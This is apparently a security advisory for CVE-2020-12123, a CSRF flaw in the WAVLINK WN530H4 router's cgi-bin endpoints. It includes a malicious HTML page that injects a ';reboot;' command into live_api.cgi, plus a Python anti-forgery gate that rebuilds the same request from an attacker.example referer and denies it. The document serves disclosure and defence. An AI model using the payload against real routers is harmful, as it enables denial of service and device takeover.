cerne.xyz

CVE-2020-12123

This vulnerability is a Cross-Site Request Forgery (CSRF) in the WAVLINK WN530H4 router.

Many endpoints in the web interface's /cgi-bin/ directory are vulnerable to CSRF. This allows other websites to submit requests to the router without the user's knowledge, and it remains exploitable even if the router manufacturer patches the cgi-bin authentication bypass (the attack only works while the admin is logged in, however).

A malicious website armed with a hoard of router vulnerabilities could set traps on the Internet: maliciously-crafted pages that trigger those vulnerabilities in the visitor's router. As an example, consider this malicious HTML page.


<html>
    <head>
        <title>Reboot!</title>
        <script src="http://192.168.10.1/cgi-bin/live_api.cgi?page=hacked&id=1337&ip=;reboot;"></script>
    </head>
    <body>
        <h1>This webpage reboots the WAVLINK router.</h1>
    </body>
</html>

This malicious HTML exploits the command-line injection vulnerability "remotely" by rebooting the router, effectively causing a denial of service. An unsuspecting user could fall victim to this attack simply by clicking a link to a page containing this code. Of course, many more damaging attacks are possible, including downloading malicious binaries to the router and executing them.

To solve this, the router must employ protections. One such protection is anti-forgery tokens. The manufacturer appears to attempt this by protecting most of the web pages with a token, but none of the cgi-bin endpoints are covered by it, rendering the defense useless.
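The following is an added illustration, not code from the router firmware or from the original advisory, of what a complete anti-forgery gate in front of a state-changing /cgi-bin/ endpoint looks like. It is written in Python as a stand-in for the router's CGI layer; the `Session`, `Request` and `csrf_check` names, the `X-CSRF-Token` header, the `csrf_token` parameter and the attacker origin are all assumptions. The router address 192.168.10.1 and the `live_api.cgi` parameters come from the page's own example. Three independent checks are applied, so that the `<script src>` request from the malicious page above is refused even before the token is examined:

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Assumed LAN address of the router, taken from the page's example <script src>.
ROUTER_ORIGIN = "http://192.168.10.1"


@dataclass
class Session:
    """A logged-in admin session carrying a per-session anti-forgery token (hypothetical)."""
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Minimal view of an incoming request (hypothetical shape, not the router's CGI API)."""
    method: str
    path: str
    headers: Dict[str, str]
    params: Dict[str, str]
    session: Optional[Session]  # None when no valid session cookie was presented


def _origin_of(url: str) -> str:
    """Reduce an Origin/Referer value to scheme://host[:port]."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"


def csrf_check(req: Request) -> Tuple[bool, str]:
    """Decide whether a request to a state-changing /cgi-bin/ endpoint may proceed.

    Returns (allowed, reason). Hypothetical gate; every check below must pass.
    """
    if req.session is None:
        return False, "no authenticated session"
    # A <script src=...> or <img src=...> on a third-party page issues a GET.
    # Refusing GET for state-changing actions removes that vector outright.
    if req.method != "POST":
        return False, "state-changing endpoint only accepts POST"
    # Browsers attach Origin (or at least Referer) to cross-site requests;
    # anything not coming from the router's own UI is rejected.
    source = req.headers.get("Origin") or req.headers.get("Referer")
    if source is None or _origin_of(source) != ROUTER_ORIGIN:
        return False, "request did not originate from the router UI"
    # The token is embedded in pages served to the admin; other origins cannot
    # read it, so its presence proves the request came from the router UI.
    token = req.headers.get("X-CSRF-Token") or req.params.get("csrf_token")
    if token is None or not hmac.compare_digest(token, req.session.csrf_token):
        return False, "missing or invalid anti-forgery token"
    return True, "ok"


def cross_site_reboot_request(session: Session) -> Request:
    """The request the page's malicious HTML makes a logged-in admin's browser send."""
    return Request(
        method="GET",
        path="/cgi-bin/live_api.cgi",
        headers={"Referer": "http://attacker.example/"},  # constructed attacker origin
        params={"page": "hacked", "id": "1337", "ip": ";reboot;"},
        session=session,  # the browser attaches the admin's cookie automatically
    )


def legitimate_request(session: Session) -> Request:
    """The same endpoint used from the router's own UI, with the session token attached."""
    return Request(
        method="POST",
        path="/cgi-bin/live_api.cgi",
        headers={"Origin": ROUTER_ORIGIN, "X-CSRF-Token": session.csrf_token},
        params={"page": "status", "id": "1", "ip": "192.168.10.2"},  # constructed values
        session=session,
    )


def demo() -> Dict[str, Tuple[bool, str]]:
    """Run both constructed requests through the gate and return the verdicts."""
    session = Session()
    return {
        "cross_site_reboot": csrf_check(cross_site_reboot_request(session)),
        "legitimate_ui_post": csrf_check(legitimate_request(session)),
    }


if __name__ == "__main__":
    for name, (allowed, reason) in demo().items():
        print(f"{name}: {'ALLOW' if allowed else 'DENY'} ({reason})")
```

The order of the checks matters for the page's scenario: the cross-site `<script src>` request is a GET with the admin's cookie attached, so it is refused at the method check and never reaches the token comparison. The token check is what protects against a cross-site form POST, and `hmac.compare_digest` keeps the comparison constant-time. Applying this gate only to the HTML pages and not to the cgi-bin endpoints, as the page describes, leaves every check above unenforced on exactly the requests that matter.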

For more information and vulnerability analysis, please see my report on the WAVLINK WN530H4.